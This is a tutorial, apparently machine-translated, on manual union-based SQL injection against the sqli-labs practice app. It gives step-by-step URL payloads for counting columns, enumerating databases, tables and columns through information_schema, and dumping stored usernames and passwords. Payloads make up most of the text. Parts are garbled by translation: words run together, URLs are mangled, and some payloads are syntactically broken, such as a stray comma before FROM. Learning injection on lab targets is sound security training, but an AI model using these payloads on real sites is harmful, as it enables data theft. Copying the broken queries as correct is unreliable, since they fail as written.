Examples of manual SQL injection and SQL Injection

Examples of manual SQL injection and SQL Injection

Preface

This article is a basic manual SQL injection process. Basically, if you know all the knowledge points in the experiment above sqlilabs, you can take the following steps to remove your pants. The following steps are also the basis for other pants removal methods. If you want to be proficient in SQL injection, you must understand and master this basic procedure.

For convenience, we still use the previous numeric injection point as an example.

Obtain the total number of fields.

In the previous introduction, we already know thathttp://localhost/sqlilabs/Less-2/?id=1idIs an injection point.

The SQL statements in the background are roughly written as follows:

select username,password,[....] from table where id=userinput

Then we useorder byStatement to determineselectThe number of queried fields.

Then payload becomes:

http://localhost/sqlilabs/Less-2/?id=1 order by 1/2/3/4....

When usingorder by 4Program error, thenselectThere are three fields in total.

Display bit

TheselectTo determine which fields are displayed.

Use the following payload (both of which can be used) for determination.

http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,3 http://localhost/sqlilabs/Less-2/?id=1 and 1=2 union select 1,2,3

When the above payload is used, the page is displayed as follows:

You can see from the above page that the page displays 2nd-bit and 3rd-bit information.

Query and select a database

After knowing the display bit, we can then display the information we want to know through the display bit, such as the database version and user information. Then we can use the following payload to know the relevant information.

http://localhost/sqlilabs/Less-2/?id=-1 union select 1,version(),database()

The page is displayed as follows:

The version information of the database and the information of the currently used database are displayed on the page.

In this way, we will know the names of all databases in the database.

Payload is as follows:

Http: // localhost/sqlilabs/Less-2 /? Id =-1 union select 1, 2, SCHEMA_NAME, from information_schema.SCHEMATA limit 0, 1 # Get the first database name http: // localhost/sqlilabs/Less-2 /? Id =-1 union select 1, 2, SCHEMA_NAME, from information_schema.SCHEMATA limit 1, 1 # Get the second database name...

Query and select a table name

Becausedatabase()The Returned Database Name is used by the current web application.database()To query information about all tables. Of course, in the previous step. We already know the currentdatabaseYessecurity.

The constructed payload is as follows:

http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()

In this way, all the table names in the current database are obtained. The returned result is:

Therefore, we know that there are four tables in the current database:emails,referers,uagents,users.

Query column names

After knowing the table name, we can useinformation_schema.columnsYou can obtain all the fields in the current table based on the table name.

Payload is as follows:

Http: // localhost/sqlilabs/Less-2 /? Id =-1 union select 1, group_concat (column_name), 3 from information_schema.columns where table_name = 'users' http: // localhost/sqlilabs/Less-2 /? Id =-1 union select 1, group_concat (column_name), 3 from information_schema.columns where table_name = 0x7573657273 (hexadecimal format of users)

The page displays the following results:

With this statement, we know that the users table exists.USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password,id,name,passwordThese fields. However, during my local test, this problem exists. In fact, in the users table of the security database, onlyid,username,passwordThe other fields are the names of users tables in other databases.

Through the above payload, we can also know thatemails,referers,uagentsField name in.

However, sometimes the background code may only be usedwhereClause.information_schema.coumnsIn this case, you can only guess the column name based on your years of hacker experience. The method for guessing is also relatively simple.existsClause can be used to guess. Suppose that we already know the table name (the exists clause is also used to guess the table name ).

The explain statement is as follows:

http://localhost/sqlilabs/Less-2/?id=1 and exists(select uname from users)

The main statement isExists (select the name of the column to be guessed from users)This sentence. If the users table does not existunameColumn name, the page does not display the content or the SQL error statement directly appears.

As shown in the following figure:

The following figure shows the fields in the users table.

http://localhost/sqlilabs/Less-2/?id=1 and exists(select username from users)

It is assumed that the users table exists.usernameColumn, the above statement program can normally return results, so the life does exist in the users tableusernameColumn name.

Pants Removal

After knowing all the table names and field names of the current database, we can dump all the information in the database. For example, we can download all the data in the current users table.

You can use the following payload:

http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(username,password),3 from users

You can obtain allusernameAndpasswordIn this way, you can also obtain data from other tables.

Summary

The above is a complete example of manual SQL injection. I don't know what everyone has learned? The editor still needs to update the article about SQL injection. Please stay tuned to the help house.